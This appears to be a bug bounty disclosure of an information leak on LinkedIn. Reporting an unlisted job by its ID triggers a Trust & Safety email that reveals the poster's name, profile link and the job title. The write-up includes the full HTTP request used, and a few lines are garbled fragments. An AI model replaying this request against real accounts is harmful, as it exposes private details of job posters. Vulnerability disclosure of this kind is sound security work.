The application has a functionality using which a user can report a job if he found the job is misleading/spam or fraud. Using this feature, an attacker can do report any unlisted (draft/under review/rejected) job. After reporting the job the victim will receive an email from ‘LinkedIn Trust & Safety Team’ saying ‘We reviewed your report. Here’s what we did.’ This also discloses the name of the user and his profile link who posted the job. Once you click on the ‘view your report’ button of the email, it will redirect you to the reports page at = ‘https://www.linkedin.com/safety/reports/:reportId’ This will disclose the name of the rejected/draft/under review job.
https://www.linkedin.com/jobs/view/3084381086/
Something went wrong
error message.Linkedin Trust and Safety
. This email includes the name of the job creator and his profile link and when u click on the View your Report
button. It will disclose the name of the job including the location.###Vulnerable request:
POST /lite/flag-content?contentUrn=urn:li:jobPosting:3086455454&reason=OFFENSIVE&contentSource=JOBS_PREMIUM_OFFLINE&authorProfileId=0&trk=report-content HTTP/2
Host: www.linkedin.com
Cookie: XXX
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Csrf-Token: ajax:3198904967979491318
X-Isajaxform: 1
Origin: https://www.linkedin.com
Referer: https://www.linkedin.com/jobs/view/3084381086/?refId=%EF%BF%BD%2F%EF%BF%BD%21d%EF%BF%BD%27%EF%BF%BDe%1A_s%EF%BF%BD%16%EF%BF%BD%EF%BF%BD&trk=d_flagship3_company
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Content-Length: 0
Te: trailers
An attacker can report any unlisted job and can access the name of the creator, name of the job name of the company, etc details.